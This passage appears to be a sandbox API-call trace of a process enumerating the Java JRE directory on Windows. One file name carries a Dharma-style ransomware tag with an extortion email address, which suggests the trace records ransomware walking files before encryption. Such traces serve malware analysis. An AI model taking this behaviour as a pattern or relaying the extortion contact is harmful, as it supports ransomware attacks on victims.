dwReserved1=0x2e0000, cFileName="jvm.dll", cAlternateFileName="")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x33d2eca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x678, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="XUSAGE~1.BAT")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x33d2eca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x678, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="XUSAGE~1.BAT")) returned 0 [0179.399] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0179.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="splashscreen.dll", cAlternateFileName="SPLASH~1.DLL")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8ba40, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssv.dll", cAlternateFileName="")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssvagent.exe", cAlternateFileName="")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21240, dwReserved0=0x0, dwReserved1=0x0, cFileName="sunec.dll", cAlternateFileName="")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sunmscapi.dll", cAlternateFileName="SUNMSC~1.DLL")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e440, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2k.dll", cAlternateFileName="")) returned 1 [0179.399] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="tnameserv.exe", cAlternateFileName="TNAMES~1.EXE")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13840, dwReserved0=0x0, dwReserved1=0x0, cFileName="unpack.dll", cAlternateFileName="")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x30240, dwReserved0=0x0, dwReserved1=0x0, cFileName="unpack200.exe", cAlternateFileName="UNPACK~1.EXE")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x0, dwReserved1=0x0, cFileName="verify.dll", cAlternateFileName="")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="w2k_lsa_auth.dll", cAlternateFileName="W2K_LS~1.DLL")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1ae40, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAccessBridge-64.dll", cAlternateFileName="WINDOW~1.DLL")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="wsdetect.dll", cAlternateFileName="")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x0, dwReserved1=0x0, cFileName="zip.dll", cAlternateFileName="")) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x0, dwReserved1=0x0, cFileName="zip.dll", cAlternateFileName="")) returned 0 [0179.400] FindClose (in: hFindFile=0x43a28d8 | out: hFindFile=0x43a28d8) returned 1 [0179.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0179.400] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0179.401] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lib", cAlternateFileName="")) returned 1 [0179.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43e5098 [0179.401] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\*", lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a29d8 [0179.401] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.401] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x95, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.properties", cAlternateFileName="ACCESS~1.PRO")) returned 1 [0179.401] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="amd64", cAlternateFileName="")) returned 1 [0179.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.401] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2b18 [0179.401] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.401] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jvm.cfg", cAlternateFileName="")) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jvm.cfg", cAlternateFileName="")) returned 0 [0179.402] FindClose (in: hFindFile=0x43a2b18 | out: hFindFile=0x43a2b18) returned 1 [0179.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0179.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.402] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a28d8 [0179.402] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0179.402] FindClose (in: hFindFile=0x43a28d8 | out: hFindFile=0x43a28d8) returned 1 [0179.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa7bbd53, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa7bbd53, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="charsets.jar", cAlternateFileName="")) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x14983, dwReserved0=0x0, dwReserved1=0x0, cFileName="classlist", cAlternateFileName="CLASSL~1")) returned 1 [0179.402] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmm", cAlternateFileName="")) returned 1 [0179.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.403] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2dd8 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CIEXYZ.pf", cAlternateFileName="")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="GRAY.pf", cAlternateFileName="")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LINEAR_RGB.pf", cAlternateFileName="LINEAR~1.PF")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4302a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PYCC.pf", cAlternateFileName="")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sRGB.pf", cAlternateFileName="")) returned 1 [0179.403] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x0, 